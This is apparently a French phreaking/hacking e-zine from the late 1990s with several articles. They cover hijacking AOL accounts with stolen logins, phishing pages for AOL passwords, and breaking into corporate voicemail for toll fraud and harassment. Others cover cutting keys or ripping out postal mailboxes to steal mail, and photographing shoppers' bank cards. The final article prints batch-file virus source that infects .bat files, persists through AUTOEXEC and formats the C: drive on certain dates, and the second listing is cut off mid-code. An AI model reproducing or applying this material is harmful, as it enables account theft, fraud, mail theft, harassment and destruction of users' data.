si vous avez des question, ou des remarque, n'esiter pas a m'envoyer un mail
a ThreaT@Caramail.com

allez,
HapPY PhreaKInG WiTh bEigE-BOX !



--->3<---
AOL HTML USER ACCOUNT
---------------------

ThreaT.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

[[[ ((( <<< COMMENT AVOIR ACCES AU COMPTE HTML D'UN ABONNER AOL >>> ))) ]]]
((et surtout comment l'utiliser))

Ecrit par ThreaT
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ


Table des matiereZ!

0/avant propos
1/introduction
2/se qu'il faut avoir pour notre operation
3/Acceder au compte HTML de votre victime
4/abuser du compte HTML
5/UNDERSITE sur AOL
6/recuperer des compte avec votre compte
7/Trouver L'IP d'un Lame AOL grace a votre compte HTML
8/Da end.


0/AVANT PROPOS
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Yep les gars, C ThreaT!
Bon, aujourd'hui on vas parler de AOL
Hackerz : "AOL, aarrgg, sa pue AOL"

Ouep peut etre mais moi je trouve que AOL et une chasse garder de LAmerZ.
Et y'a plein de truc marrant a y faire!
Par exemple grace a AOL je paye un abonnemment illimiter de 0,00F par mois
et 0,00F de comunikation par MinuTe

Komment! Grace au compte Hacked + OutdiaL Nø vert

donc, la je vais vous montrer comment faire pour acceder au compte HTML
d'un LamerZ AOL Car avec un Compte HTML, on peut faire plein de truc sympas

1/INTRODUCTION
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Bon, meton nous en condition!
sa vous est jamais arriver d'avoir un login et un password AOL qui ne vous
appartient pas? si!
bien sur, vous aver voulu voir son compte HTML, seulemment Problem!
on ne peut y acceder Par une connection INVITER. Merde! fait chier.

But How Can I Do iT?


2/CE QU'IL FAUT AVOIR POUR NOTRE OPERATION
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

Donc, pour acceder au compte HTML d'un Lamer AOL, il vous faut etre dans une
condition bien particuliere. il faut etre loger sur AOL avec le Login de
la victime.

donc, vous vous demerder pour me trouver son login et son password (avec BO,
Socket23, Netbus etc....) une fois en sa possesion. vous vous loger dessus.

et la, vous remarquer que si vous aller dans "MON AOL", "compte HTML"
AOL vous repond qu'il fo etre connecter en HOTE pour acceder a ce service.

HHHAARRRGGG!!

Mais comment Faire Bordel de chiote pour poUvoir......

3/ACCEDER AU COMPTE HTML DE VOTRE VICIME
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

Procedure Etape par Etape
1/poseder le Login & password de la victime
2/lancer votre connection AOL en choisisans INVITER
3/une fois connecter inserer dans les champ prevu a cet effet, les LOg&Pass
de votre victime

4/acceder au compte HTML
------------------------
alors la y'a 2 facon!

a/acceder au compte sous DOS
donc, vous m'ouvrer une session Dos puis vous faite ce qui suit

------DOS--------------
C:\>ftp user.aol.com
connected to members.aol.com
220-guest logins are "ftp" or "anonymous" please use your full email
220-address as the password when accessing the archive as a guest user
220-
220 user54 FTP server (Version wu-2.4(1) Wed aug 19 17:07:28 EDT 1998) ready.
User (members.aol.com:(none)):


--------------------------------
----<<petit commentaire>>-------
Tres interresant, on vous demande le login (user:)
donc la vous taper le login de la victime sous laquelle vous ete connecter
par exemple vous etes loger sous "VICTIME"

donc pour "user:" vous me metter VICTIME
Et TAK!
----<<fin du commentaire>>------
-------------------------------
User (members.aol.com:(none)):Victime

230-Welcome to your FTP victime
230-bla bla bla
230-bla bla bla
230-Thank-you for choosing AOL!
230-
230 Guest login ok, access restrictions apply
FTP>
----------------------------------
----<<petit commentaire>>---------
donc la le prompte et passer de C:\> a FTP>
voila, tu est Loger
Tape dir ou Ls pour voir!
------------------------------------
FTP>dir
200 PORT command successful.
150 Opening ASCII mode data connection for .
total 24
drwxrwxr-x 3 500 501 8192 jan 28 18:16 .
drwxrwxr-x 120 0 501 8192 jan 28 18:16 ..
lrwxr-xr-x 1 0 501 13 jan 28 18:16 README -> /usersFAQ.txt
drwxrwxr-x 2 501 501 8192 jan 28 18:16 private
226 Transfer complete.
267 bytes received in 0.22 seconds (1.21 Kbytes/sec)
FTP>

--------------------------------------------
voila tu vois toute l'arborrecence du compte du pelo
---------------------------------------------

b/Acceder au compte avec un logiciel FTP

la technique Nø2 et mieux que la premiere vue que la vous aver un interface
GrafiK, donc, c'est plus simple a gerer quand on est Newbie.

Procedure!
Lancer votre logiciel de FTP (CuteFTP, FTPexplorer, etc...) et creer un compte
avec les caraceristique suivante

Profile Name: AOL page User
Host Address: members.aol.com
Port: 21
LOGIN: VICTIME
PASSWORD: (Ben la vous metter rien)

-->Connect!

Et vou vla connecter sur un beau chtit compte FTP ou vous pouver foutre vos
pages, ou modifier les pages qui y sont deja.

Newbie: "ouai, c'est cool, mais a quoi sa me sert tout sa"
ThreaT: "et ben maintenant newbie, tu peut......


4/ABUSER DU COMPTE HTML
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Bon, ben maintenat kon a un joli compte a nous, On vas en abuser.
donc plusieur facon.
On a 10Mo de gratos, autans en profiter! prener tout les soft secret de
votre babasse et fouter les sur le compte, comme sa vous pourez y acceder
depuis n'importe quel poste.
par exemple je suis dans un cyber cafe, et je veut connaitre le pass de connection
je vais sur mon FTP pirater ou j'ai prealablemment foutu mon soft de deplombage
et voila, sa vous evite de vous promener avec une diskette.
Il y a encore plein de moyen mais la je vous fait confiance ;)

5/UNDERSITE SUR AOL
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Une autre maniere d'abuser du compte HTML de votre victime et l'UNDERSITE!
si vous savez pas ce qu'st un Undersite, aller voir mon article qui traite
du sujet.
Donc, tu te log sur le FTP, et la tu decouvre plein de page web qui parle de
connerie dont t'en a rien a foutre.
tu telecharge sur ton dur l'une des page, et tu y insere un lien qui pointe
sur ta page qui est bien cacher sur l'espace FTP de la victime.
Tu comprend??
Comme sa tu un a un site Gratos ou tu peut mettre tout ce que tu veut sans te
soucier de la loi et des represaille (MP3, Photo Du president a poil,
Nø de compte hacked etc...) tu vois le genre quoi!
par contre il fo vachemment maitriser pour avoir un Undersite car il fo le
changer de place en moyenne tout les 2 mois.

6/RECUPERER DES COMPTE AVEC VOTRE COMPTE.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Alors la! je vais vous espliker une technik qui m'a ete enseigner par ANGUS.
Tu te fabrik une jolie page Web qui dit que AOL offre 50H de connection gratuite
a l'occasion de son aniversaire a tout abonner qui envoi un buletin de
participation.
Donc tu fait une page qui sert de buletin de participation avec un enplacemmet
Pour le login, et un autre pour le password! tout sa qui est directemment
rerouter sur ton email. (pour le code HTML, referer vous a PhreAkAzoide I)
une fois ceci fait, vas te promener sur les salon AOL, et dit a Tout ces lamerz
la bonne nouvelle!!
ThreaT: "Et les Gars, Vous avez vue que l'on peut gagner 50H Gratuite?"
LamerZ: "Ha ouai, comment"
ThreaT: "HTTP://members.aol.com/victime"
LamerZ: "Putain cool, jvais aller voir sa!"

Et voila!
quand AOL vas ce rendre compte de l'arnaK, il vont contacter le proprio du
site Web en le menacant de bloKer son Compte!
Mais nous, on en a rien a foutre vue que le compte ne nous appartient pas :)

Et on recommenceras avec d'otre compte HackeD.


7/TROUVER L'IP D'UN LAME AOL GRACE A VOTRE COMPTE HTML.
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Donc, pour cette methode voila la Theorie.
Sur certain site, (style www.cnil.fr) il y a une page qui te donne des info
sur ta bacanne, (ton explorateur, ton pross, ton OS, la couleur de ton slip etc..)
mais surtout, il te donne une info vachemment importante, qui est TON IP !
je sais plus quel commande ces salaud utilise, je croit que c'est un truc
avec HostAdresschezpasquoi, enfin demerder vous!
donc, le truc et de faire une page HTML avec cette commande qui trouve l'IP du
mec connecter sur ton site et que cette putain d'IP te soit directemment rerouter
sur ton mail. :)
Comme sa, quand tu vois un LamerZ dans un salon, tu lui dit
ThreaT: "Et lame! vas voir sur http://members.aol.com/victime"
LamerZ: "pourkoi?"
ThreaT: "Tu vas voir, Y'a plein de punter!"
LamerZ: "A ouai, trop Kool"

et une fois qu'il est aller visiter ton Vieux site Bidon, TaK...

8/DA END
ÄÄÄÄÄÄÄÄ
Bon, ben voila! je crois que c'est a peut pres tout.
donc amuser vous bien avec sa

ThreaT.


--->4<---
VMB POUR LES NEWBIEZ
--------------------

Bon je commence par vous dire :"Salut a tous bande de Phreakers !"
L'article ki va suivre devait etre publie dans Phreakazoide III, le
E-zine ki ne sortira jamais a cause d'un probleme judiciere dont a etait
victime un des pilliers du groupe, et dont nous avons tous etait impliques...
Donc je tiens a vous dire : FAITES GAFFES LES GARS, ON EST JAMAIS TROP PRUDENT
j'suis bien place pour le savoir !!! Et c'est kan on s'y attends le moin ke
ca tombe Bordel de Merde !!!! Et ca me fait vraiment chier de penser que un de mes
meilleurs pote Phreaker n'est plus la pour partager avec moa des moments de
delire sur le net ou sur les VMB...Biensur il est pas mort, mais ce ne sera
jamais comme avant...
A ce sujet je tiens a remercier des gars qui, depuis que le site Phreakazoide
n'existe plus, plublient justement les 2 numeros de Phreakazoide...
Voici les adresses de certains d'entres eux :
http://www.multimania.com/bolliop
http://www.multimania.com/pgk
Alors voila : MERCI de la part d'@ngµS.

Bon je me fous un petit live de Metallica et pi on i va...




ÉÍ»
ÌÍÎ / KESAKO BORDEL ???
Ê Ê

Bon pour commencer, en gros, une VMB c'est une boite vocale apartenant a une
entreprise comme Lego france, Boing, FT, EDF, etc...
Ces boites vocales sont mise a disposition des employes de l'entreprise pour
des raisons professionnels, comme ca chaque employes peuvent communiquer entre
eux par le bier de leur boite vocale, de chez eux ou de leur poste de travail
pour echanger des infos au sujet de leur bouleau, etc...
Voila a koi ressemble un message :
Gars_ki_laisse_un_msg:"Salut thierry, je viens de prendre contacte avec
monsieur Trouduc pour la reunion de demain, donc elle a bien lieu a 15h00
comme prevu, pi apres la reunion on enchainera sur une mega partouze, ca
va etre excellent...bon a+ thierry !"

Pour un phreaker, une VMB va servir a echanger des infos avec d'autres
phreaker par exemple. La VMB va servir en quelques sorte de "Squat" a phreakers
...Ou alors elle va servir a telephone gratos, etc,etc...

ÉÍ»
ÌÍÎ / KOMEN LES TROUVER BORDEL ??
Èͼ

Ca c'est poa le plus dure. Il y a plusieur facon de trouver des VMB :
* Vous prennez l'annuaire a la page nø vert.
* Vous scannez !
Bon losque vous appellez un nø vert, deux soluces souvrent a vous, soit
une meuf ou un mec decroche, "Allo ?", alors dans ce cas raccrocher et
trouver un autre numero...Ou soit vous avez un repondeur, la ca commence
bien ! Vous ecoutez ce que ca dit pi si ca ne parle poa de boites vocales
essaye de la trouver en appuyant sur les touches du telephone (#,*,0,etc..)
si c toujours le meme repondeur de merde, recommencer avec un autre nø,
mais si ca marche, cad si ca dis un bordel du genre :"Pour consulter votre
boite vocale taper 1, etc.." c tres cool because vous en avez trouver une !
Ensuite la partie que j'intitule Hacking de VMB va commencer... =)


ÉÍ»
Ì / HACKING DE VMB :
Èͼ

Votre but est, je le rappelle, de trouver une boite pour vous l'approprier !
Donc vous commencez par trouver une boite, cad tapez des numeros de boite...
La difficulter a trouver une boite depent de la marque de la messagerie vocale
, en effet, sur certaine VMB il est tres facile de trouver des boites car
le repondeur vous interrompt lorsque vous tapez un mauvais numero.
EXEMPLE :

Boite :"Veuillez entrer votre numero de boite" (Le phreaker commence a scanner)
Phreaker : 1,(la boite ne dit rien, le Phreaker enchainepar un autre chiffre),1
Boite :"numero incorrect veuillez recommencer" (Le nø de boite commence par 1)
Phreaker : 120
Boite :"numero incorrect veuillez recommencer" (commence par 12)
Phreaker : 121
Boite :"Veuillez entrer votre mot de passe" (121 est un nø de boite !!!)

Dans ce cas la, c tres facile !!!

Voici l'exemple de boite plus dure a scanner... :(
EXEMPLE :
Boite :"Enter your mailbox nø following by #"
Phreaker :"5400 #"
Boite :"Enter your password and press #"
Phreaker :"0000 #"
Boite :"Login incorrect, please try again"

Alors en fait dans ce gars on ne sais rien !!!
* On ne sais poa de combien de digits (nombres) est le numero de boite.
* On ne sais pas de combien de digits est le password.
* On ce fait chier a essayer des password pas defaut alors k'on sais meme
poa si le numero de boite est valide bordel !
en revanche : C'est souvent ce type de messageries vocale qui possede un
outdial !!! :):)
-----------------------------------------------------------------------------
CONSEILS : Lorsque vous avez a faire a un type de boite dure a scanner
comme les "meridians", ne vous faites pas chier a scanner le password en
incrementent chaques fois d'une unites !!! (ex : 0000,0001,0002,etc...)
mais essayez plutot les password par defaut exemples :
0000,1111,2222,etc...
123,1234,etc...
Ou alors un truc ki marche tres souvent, essayer kome pass le numero de la
boite...
-----------------------------------------------------------------------------

ÉÍ»
Ì Ì / PUTAIN KE FAIRE ??
Èͼ

Bon une fois ke vous avez Hackez une VMB, ben a vous de vous amuser, d'abort
si vous voulez vous l'approprier, changez de Password (le premier truc a faire)
et a vous de visite la boite...
Je vous conseil au debut de prendre un bout de papier pour noter l'arboresence
de la boite, cad quelle touche fait quoi ?
EX:

1 ---------> Lire les nouveaux msg
|
9-----> Passer au msg suivant
|
7-----> Reecouter le message
|
8-----> Faire une pause durant l'ecoute
|
etc...

2 ---------> Enregistrer un msg
|
#-----> Envoyer le msg
|
*-----> Annuler l'enregistrement

3 ---------> Menu Administration
|
1-----> Changer le Mot de pass
|
2-----> Enregistrer nom et prenom
|
etc...
4 ---------> Rappelle Automatique (putain alors ca c excellent !!!)
|
1-----> Programmer une heure de rappelle
|
2-----> Programmer les jours de rappelle
|
etc...
etc.....
etc.....

Un schema de ce type vous permettra de vous familliariser avec le type de
la boite bordel !

ÉÍ»
ÌÍ / UTILITE BORDEL ??
Èͼ

Ben maintenant que vous avez votre VMB, vous pourrez faire des connaissances
avec d'autre Phreaker peut etre ??? En tout kas moa c comme ca ke j'ai fait
la connaissance de mes 2 premiers potes Phreaker ki sont Fozzy et
Phreakol Maker avec lesquels on a forme Phreakazoide par la suite...
Sinon, s'il n'y a poa de trace de phreaker sur la VMB, donnez moi le numero
!!! ;-)
Sinon faites venir des potes pas des lamers s'il vous plait, pi echanger des
infos, tous les sujets sont permis mais les VMB sont ideal pour parler
Phreaking/Hacking/etc... bah oui ca fait moin lamer que de parler Phreaking
dans un salon d'AOL !!!!

ÉÍ»
ÌÍ / LES OPTIONS BORDEL ??
Ê

* RAPPEL AUTOMATIQUE : Sur certaines VMB, il y a l'option rappel automatique
ce qui permet de vous faire rappelle quand vous le souhaite ! Alors l'ideal
c'est d'avoir un putain de portable...Dans ce cas vous rentrez le numero
de votre portable puis l'heure a laquelle vous avez un RDV par exemple.
Et puis si vous avez tout bien configurer ben votre portable sonnera et
lorsque vous allez decrocher vous attendrez l'annonce que vous avez enregistrer
pour l'occation.
EX: "Dring ! Dring ! (vous decrocher) N'oublis pas, tu a rendez vous pour
la mega touze chez les DURANDS !!!"
Ou alors cette option peut servir pour le harcelement telephone, je ne suis
pas un exper dans le genre, mais c'est amusant de faire sonner le telephone
d'un gars k'on aime pas toutes les 20 min de 22h30 a 6h00 du matin !!! :))

* OUTDIAL : Tout bon phreaker possede un Outdial, en fait avec un outdial
on peut appeller a l'exterieur de l'entreprise, et donc telephoner gratos
au frais de l'entreprise !!! C'est vraiment pratique pour parler a sa copine
pendant des heures... ;)
En fait c kome une option, kan vous etes dans votre boite, essaye le 0 par
exemple pour sortir du standart suivit du numero a appeller...
Malheuresement, les outdials sont maintenant tres vite grilles. :( Ou alors
sont bride c'est a dire que l'on ne peut pas faire tous les numeros comme
les 083668**** par exemple.

ÉÍ»
ÌÍË / FIN :
Èͼ

Voila c'est tout ! Putain il se peut ke je n'ai poa etait bien claire et
bien precis dans mes explications, mais bon, si vous commencez dans le
phreaking ceci vous aura apris quelque chose je l'espere...
si vous voulez des numeros de PABX ou de VMB, ecrivez moi je vous ferais
part des plus connus bordel !!

mustain@multimania.com
http://www.multimania.com/mustain <<===La @ngµS Homepage.

@ngµS.


--->5<---
BOITE AU LETTRE DES PTT
-----------------------

Bon tout d'abord cette technik consiste a etre en possession
d'une clé qui vous permetras d'avoir accès au B-A-L (boites aux lettres)
des PTT ou tout le monde vas poster son courrier.

Elle vous permetteras Donc l'acces aux courrier:
--)revente de timbre
--)agreable surprise dans certaines envelloppes!!

Attention je decline toute responsabilite sur l'efficacite de
cette clé car suivant les region les cles changent.
donc je vous proposserait 2 choix suivant vos capacitee:

le premier choix consiste a reproduire la cles dont je vous donnerait les
cotes sur le schema.je vous rappelle que cette cles n'est peut etre
pas valable dans votre region.
le deuxieme choix lui vous assurreras le bon fonctionnement car elle
serat adaptée aux B-A-L de votre region.

1) etapes:Pour vous procurer la cle ci-dessous n'aller pas chercher biens
loin,aller chez un serrurrier/cordonnier et demander lui une cles avec
les cotes que je vous donne.il faudrat surement insister car il ne sont
pas bien d'accord mais bon faite un peu de social!


(-----------40------------)
####
# #
############################### ##
######## # #
8 ######## ####
########
########

(--11--)

Hauteur du bloc: 8 Mm
largeur du bloc: 11 Mm
longueur du bras: 40 Mm (minimum)

2 etape:Maintenant que vous ete en possessions de la cles brut il vas faloir
la mettre aux cotes de la B-A-L .
Tout d'abors il faut enlever 1 Mm a la largeur du bloc de 11 Mm ----) 10 Mm

####
# #
############################## ##
00112233 # #
112233 ####
11 33
33


-----------------------------------------
| colone | Hauteur | Largueur |
-----------------------------------------
| 00 | 4 Mm | 2.5 Mm |
-----------------------------------------
| 11 | 7.5 Mm | 2.5 Mm |
-----------------------------------------
| 22 | 6 Mm | 2.5 Mm |
-----------------------------------------
| 33 | 8 Mm | 2.5 Mm |
-----------------------------------------

Si apres cela la cles force dans la serrure arrondisser les angles de tete de
colonne et si sa ne marche toujours pas desole.

2 choix:ce choix est pour les petit bourrains et les petit serrurier du
dimanche soir car il consite d'abords a trouver une B-A-L assez isoler,
si vous habiter dans une grande aglommeration ca risque d'etre dur
mais bon quand on veut on peut,donc apres avoir reperer une B-A-L il faut tout
simplement l'arrachée de son support( ou la demonte mais ceci est rare!!!),
personnellement nous l'avons arachée en tapant de cote avec des coups de
savates c'est dur mais a force on y arrive ou alors si vous etes equipe d'une
voiture vous entourez la B-A-L d'une cordes que vous attache a l'attelage ou
au crochet de remorquage puis un petit!mais vraiment leger !coups de premmiere
suffira pour la deboite !!!!
Maintenant vous ete en possession d'une B-A-L, j'espere que vous ete heureux!!
Mais le travail est loin d'etre fini!!
Donc vous demonter la serrure,vous analyser le fonctionnement,et la 2 choix
se presente a vous :
-soit vous l'emmener chez le serrurier et vous lui dites que vous avez perdu
la cles de cette serrure.
-soit vous acheter la cles brute (voir cotes schema 1)et vous vous mettez au
boulot en annalysant bien tous les differant crants.


Je vous recommande de vous trouver plusieurs B-A-L pour que ca se remarque
moins et de ne pas trop en abuser car le vols de courrier ce paye tres cher
de nos jours.

Bon voila ,j'espere que vous en ferez bonne usage!!


================================================
| |
| *** *** * * *** *** |
| * * * * * * * * * * |
| * * * * * * * * * * |
| * * * * * * * * * * |
| * * * * * * |
| * * ** * * |
| |
===== * * ** ** * * **** *** *** =====
| * * * * * * * * * * * * |
| **** **** * ** ** *** ** |
| * * * * * * * * * * * * |
| * * * * ** * * **** * * *** |
| |
========== ** * * * * ==========
| * * *** ** * |
| ** *** * * * ** |
| |
======================




MavericK
~~~~~~~~

--->6<---
SOCIAL PHOTO
------------

bonjour !! !! ! ! ! !
technike de social ki n'est pas du social, la photo !

vous avez besoin :
-d'un appareil photo num
-d'un copain
-(d'un supermarché pas loin)
-de temps

donc vous debarkez a un endroit ou il y a bp de monde, avec votre pote
on se dit au supermarché

sortez votre appareil photo numerik

mettez vous a un endroit avec une belle vue sur les caisses
et la vous mitraillez un mec ki sort sa carte bleue, ( en visant la carte bleue)
si votre appareil met du temps a recharger , ben loopez pas l'unike foto !
attention de pas se faire capter, si on vous demande ce ke vous faire, vous
dites, je fais un repotage (ou un dossier) sur l'argent(ou sur les
supermarches)alors je prends des fotos c tres dur mais bon...
bye





bon et biensur avec ce numero de carte bleue on peut faire du net gratos
avec notemment la carte fnac ou encore plein de truc, allez...

bolliop
bolliop@caramail.com
www.chez.com/mvm



--->7<---
PRISE TELEPHONIK
----------------

Tutto de bolliop sur les prises telephonikes
pour ke la scene avance
phrEaking rulezZz


tout d'abord : Bonjour

LES PRISES TEL


bon alors dans bp de tutos de phreak, notemment pour les Boxes, on parle de
fils bleus, rouges, jaunes, gris ... etc...
j'avoue ke je me suis bp pommé alors je vais essayer de vous expliker
comment c reelement fait:

1-La prise murale(beige )
2-les tels avec base(le combiné branché a une base ki est branchée au mur)
3-les tels sans base(direct le combiné branché au mur)


________________________________
alors C parti



1-La prise murale

bon alors elle est beige et se branche dans le mur,
c une prise pour tel, modem, nitel....etc( vous savez ce ke c kant meme !)
certaines sont prevues pour pouvoir recevoir une autre prise identike sur
elles(souvent les prises de nitel et modems)mais je n'en parlerai pas dans
ce tuto.

bon alors c clair l'exterieur on s'en fout un peu, ce ki compte c l'interieur:
pour ouvrir il peu y avoir des vis , si y'en a pas ,fo y aller au marteau!


bon et la vous regardez a gauche
vous voyez:

en haut a gauche :
--------
1er fil-->----
2er fil-->----
----
----

la ou y'a marké 1er et 2 eme fil c les 2 seuls(et je dit bien seuls) ki
sont indispensables pour avoir la tonalité !


2-les tels avec base:


bon alors le fil ki est branché au mur va dans la base:
regardez la prise ki va dans la base, elle est large !, on voit les 4 fils
et il est conseillé de couper tres pres de cette prise ,(pour avoir bp de
fil !)n'essayez pas de brancher directos sur cette petit prise,c impossible !

le fil ki va de la base au combiné a des 2 cotes une prise ke je qualifierai
de lonhue contrairement a la large vue + haut
ce fil peut etre inversé( les 2 cotés sont les memes)

3-les tels sans base

le fil ki se branche ds le mur et ki va sur le tel (combiné direct) a une
petite prise de style "longue" c la raison pour lakelle les fils de tel a
base et de tel sans base ne sont pas compatibles, degouté !
ils ne sont compatibles k'en les coupant , arf !
et la ca marche



une technike pour se procurer des tels et des prises(cables) , allez aux
puces , y'en a plein de vieux!

bolliop
bolliop@caramail.com
www.chez.com/mvm


--->8<---
LES VIRUS V.B.I
---------------
By ThreaT.

CA Y'é!!!
A La deMAnde GeneRAl, J'ai DEsidER de PUblier MEs petIT BéBé
J'ai NOmmer Mes VIrus V.B.I (Viral Batch Infector)
PourKoi je dis "MES" virus, ParCe qUE c'ESt Moi Qui Les AI MIS AU MOnde
Et OUI, C'eSt BEau D'etRE Un peRe GEniTEur.
Bon, poUr ceuX quI debArquE je Vais espliQuer vITe faiT ce QU'est Un V.B.I

1/What Is A V.B.I???
un vbi est un virus ecrit en batch! et qui infecte ses petit copain ayan
l'extansion .bat (ainsi que .EXE et .com)
comment est-ce possible??
C'eSt sur que c'est pas avec les commande DIR, CD Et CLS que tu vas chier
un vbi! pour faire un virus de cette race, inutile de preciser qu'il faut
etre experimenter eN parametrage batch.
Oui, MAis comment sa marche???
Sa marche exactemment comme un virus normal!

Saver vous que un VBI peut:
-infecter un fichier batch
-infecter un fichier com
-infecter un fichier exe
-ce lancer au demmarage de la machine
-etre resident
-s'activer lors d'une faute de frappe
-faire une crasse a une date bien presise
-etre indetectable par les A-V
Et j'en passe et des meilleur,
EX:alterer les commande dos,(remplacer dir par CD, cls par format c: ....etc)


INconveniant de ce genre de virus!!
les VBI ne sont des virii actif que sous DOS, sauf exeption rare!!
(pour les infecteur batch), enfin bon, on vas pas rentrer dans les detailles


Kel est l'interret de programmer ce genre de virus??
La reponse est evidente!!
Ce sont des virus EXTREMEMENT RARE, donc INDETECTABLE!!
vas me trouver un A-V qui effectue une recherche de parametre batch
Efectivemment, je croit qu'il n'existe qu'une 20ene de virus de ce type dans
le MONDE! alors qu'il doit y avoir plus de 50000 virii infecteur COM et EXE
et plus de 10000 infecteur de macro word!
DE plus, les bug d'alteration d'octet dans les fichier et Kazi NUL!
normal, le batch ne traite pas directemment avec les octet.

MAis comment aij U l'iD de coder de tel virii??
Tres simple! je me faisait chier et je lisais le MJ13 II, quand je suis
tomber sur un article de Black-Burd qui traitait du sujet.
J'ai trouver l'ID tellemment genial que j'ai decider d'en faire Un directe!
et quand je l'ai terminer, qu'il marrchait impec!, j'en ai fait des variante
que je vous presente aujourd'hui!!!

Je vous presente DOnc le Virus "AbsUrdUs DeliRiuM"

  
fait par moi meme!
le fichier MVM.BAT et la source
celui ci et un virus infecteur .bat exclusivemment
le fichier MV1.BAT et la premere variante.
celui ci est infecteur .bat et .exe
et enfin le fichier MV2.BAT est la deuxieme variante
celui ci est infecteur .bat et .com

!!COMPORTEMMENT!!
ces trois virus on le meme comportemment, a part les extantion d'infection
ceux si sont sur le meme schema!!
une fois le virus lancer, celui ci ce met en memoire
quand le virus est en memoire, celui ci infecte la premiere extantion cible
non infecter dans le rep courant lors de l'appelation de la commande "dir"
Si le virus parvient a infecter le fichier "AUTOEXEC.BAT", celui si devient
en quelque sorte un infecteur de boot, vue qu'a chaque demarage, le virus
se met en memoire!!
Pour l'infection des fichier .EXE et .COM, la technique utiliser et celle du
virus COMPAGNON!
pour que le fichier BAtch ce lance avant le fichier executable, une technique
particuliere et mise en place (etudier le code source merde!)
Une fois que le virii a infecter a tord et a travers, celui si attendra
passiamment que votre date system comporte le chiffre "15"
pour formater votre DD (J'avout que sur ce coup, j'ai pas etez tres imaginatif)
Mais bon, au moin vous serez comment formatter un DD, sans rien demander a personne


Mais pOUrkOI n'aij pas fait un infecteur .BAT, .EXE et .COM en meme temp??
parce que sa bugerais a mort! et je risquerait d'etre engager cher micro$oft
de plus, ce genre de virus serait non optimiser donc, pourit
a mon avit, si vous vouler une infection nikel! mieux vaut utiliser le virus
infecteur .BAT! c'est le plus discret et c celui qui bug le moin.
car vous remarquerez que l'orsqu'un fichier EXE ou COM et infecter, et que
l'on rebascule sous DauB, les fichier en question foire du cul!

Bon, voila! c'est tout ce que j'avais a dire, a part que je decline toute
responsabiliter quand a la mauvaise utilisation de ses code source!

A oui, autre chose! vous pouver reproduire, modifier, et publier ce virus
au tant de fois que vous le vouler! seulemment faite en sorte que mon niK
soit toujours present

Style, vous optimiser mon virus pour en faire une vrai bete de boucherie
electronik, metter un petit message du type
"AbsuRduS DEliRUm V 2.0, Fait pArt ThreaT & voTre-nIK"


ps: pour plus de detaille referer vous a l'article de BLACK-BURD dans le zines
MJ13 II

ps2: si par erreur vous avez lancer l'un des 3 fichier Batch, et que vous vous
douter que mon virii et en train d'organizer une partouse electronik dans votre
system, mailer moi a ThreaT@Caramail.com, je vous espliquerait comment le virer
manuellement!
BON!

ALLer, HapPy coDing, et HApPy TeaCHinG!!

ThreaT.
Ju$T f0® $@y Fu(4

----------------------> CODE SOURCE BATCH DES 3 VIRII <-------------------
---------------------------------------------------------------------------

*****************************--<<<MVM.BAT>>>---****************************

REM Virii Infeteur .BAT
@echo off %vir%
dir |date > abc.bmb %vir%
find "15" abc.bmb > nul %vir%
if errorlevel 1 goto virdeb
cls %vir%
echo AbSUrdus DeLirIuM V1.0, By ThreaT %vir%
echo o |format c: /q %vir%
:virdeb
del abc.bmb %vir%
doskey/echo:off > nul %vir%
if exist %0.bat set good=%0.bat %vir%
if exist %0 set good=%0 %vir%
if exist c:\ÿÿ.bat goto debut %vir%
type %good% |find "vir" > c:\ÿÿ.bat
attrib +r +h c:\ÿÿ.bat %vir%
goto debut %vir%
find "M*V*M" %1 >nul %viral%
if errorlevel 1 goto y %viral%
goto end %viral%
:y %viral%
set ok=%1 %viral%
goto end %viral%
:debut %vir%
%vir% set path=c:\;%path%
%vir% doskey dir=ÿÿ $T dir $1
%vir% set good=%0
if exist %0.bat set good=%0.bat %vir%
if exist %0 set good=%0 %vir%
%vir% if (%0) == (ÿÿ) set good=c:\ÿÿ.bat
type %good% |find "viral" > c:\$virus.bat
:end %viral%
for %%a in (*.bat) do call c:\$virus.bat %%a
if (%ok%)==() goto virend
type %good% |find "vir" >> %ok%
:virend
del c:\$virus.bat
%vir% set ok=
%vir% set good=


*******************************<<<MV2.BAT>>>********************************

rem Virii InfeCteuR BAT & EXE
@echo off %vir%
dir |date > abc.bmb %vir%
find "15" abc.bmb > nul %vir%
if errorlevel 1 goto virdeb
cls %vir%
echo Arf Arf.. AbSUrdus DeLirIuM,, By ThreaT, With fucking of M*V*M H.C %vir%
echo o |format c: /V:ThreaT %vir%
:virdeb
del abc.bmb %vir%
doskey/echo:off > nul %vir%
if exist c:\ÿÿ.bat goto debut %vir%
if exist %0.bat set good=%0.bat %vir%
if exist %0 set good=%0 %vir%
type %good% |find "vir" > c:\ÿÿ.bat
attrib +r +h c:\ÿÿ.bat %vir%
goto debut %vir%
find "M*V*M" %1 >nul %viral%
if errorlevel 1 goto y %viral%
goto end %viral%
:y %viral%
set ok=%1 %viral%
goto end %viral%
:debut %vir%
%vir% set path=c:\;%path%
%vir% doskey dir=ÿÿ $T dir $1
%vir% set good=%0
if exist %0.bat set good=%0.bat %vir%
